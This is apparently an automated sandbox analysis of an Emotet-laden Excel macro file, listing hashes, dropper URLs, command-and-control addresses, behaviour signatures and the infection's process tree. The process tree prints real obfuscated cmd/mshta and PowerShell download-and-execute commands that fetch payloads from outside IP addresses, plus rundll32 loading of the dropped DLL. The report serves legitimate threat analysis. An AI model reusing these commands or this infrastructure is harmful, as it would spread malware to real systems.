Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 06:05

General

  • Target

    35731290084461452.xlsm

  • Size

    115KB

  • MD5

    cb5ae08f0635dff32c684570750108b5

  • SHA1

    33c65f18d7f753d82cb4ac73540d5e53acb61d5f

  • SHA256

    bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603

  • SHA512

    4728bc8629c0584e23d02d4705ce607c6dd76740f4b64b089c8df5dc30f3fd3bec6d6dd4e39ab0bddb4da4fad6bc184496f580232555f74148db38455084f564

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\35731290084461452.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1180
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1352
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1832
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1516
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:928
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1320
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1780
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kumczjnrfieyim\cnutpdvgeg.xwx",JSmuVbcRg
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1764
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kumczjnrfieyim\cnutpdvgeg.xwx",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1168

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • memory/1168-96-0x0000000000230000-0x0000000000258000-memory.dmp
      Filesize

      160KB

    • memory/1168-114-0x0000000002AD0000-0x0000000002AF8000-memory.dmp
      Filesize

      160KB

    • memory/1168-112-0x00000000029F0000-0x0000000002A18000-memory.dmp
      Filesize

      160KB

    • memory/1168-110-0x00000000028F0000-0x0000000002918000-memory.dmp
      Filesize

      160KB

    • memory/1168-108-0x0000000002710000-0x0000000002738000-memory.dmp
      Filesize

      160KB

    • memory/1168-106-0x0000000002630000-0x0000000002658000-memory.dmp
      Filesize

      160KB

    • memory/1168-104-0x00000000024B0000-0x00000000024D8000-memory.dmp
      Filesize

      160KB

    • memory/1168-102-0x0000000002380000-0x00000000023A8000-memory.dmp
      Filesize

      160KB

    • memory/1168-100-0x0000000000C00000-0x0000000000C28000-memory.dmp
      Filesize

      160KB

    • memory/1180-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1180-58-0x0000000075831000-0x0000000075833000-memory.dmp
      Filesize

      8KB

    • memory/1180-55-0x000000002FFC1000-0x000000002FFC4000-memory.dmp
      Filesize

      12KB

    • memory/1180-56-0x00000000713C1000-0x00000000713C3000-memory.dmp
      Filesize

      8KB

    • memory/1320-71-0x0000000000760000-0x0000000000788000-memory.dmp
      Filesize

      160KB

    • memory/1352-59-0x000007FEFBD71000-0x000007FEFBD73000-memory.dmp
      Filesize

      8KB

    • memory/1516-64-0x0000000002362000-0x0000000002364000-memory.dmp
      Filesize

      8KB

    • memory/1516-63-0x0000000002361000-0x0000000002362000-memory.dmp
      Filesize

      4KB

    • memory/1516-62-0x0000000002360000-0x0000000002361000-memory.dmp
      Filesize

      4KB

    • memory/1764-93-0x00000000001C0000-0x00000000001E8000-memory.dmp
      Filesize

      160KB

    • memory/1780-82-0x0000000002400000-0x0000000002428000-memory.dmp
      Filesize

      160KB

    • memory/1780-86-0x0000000002660000-0x0000000002688000-memory.dmp
      Filesize

      160KB

    • memory/1780-84-0x00000000025C0000-0x00000000025E8000-memory.dmp
      Filesize

      160KB

    • memory/1780-80-0x0000000000800000-0x0000000000828000-memory.dmp
      Filesize

      160KB

    • memory/1780-78-0x00000000002A0000-0x00000000002C8000-memory.dmp
      Filesize

      160KB

    • memory/1780-91-0x00000000028D0000-0x00000000028F8000-memory.dmp
      Filesize

      160KB

    • memory/1780-88-0x0000000002780000-0x00000000027A8000-memory.dmp
      Filesize

      160KB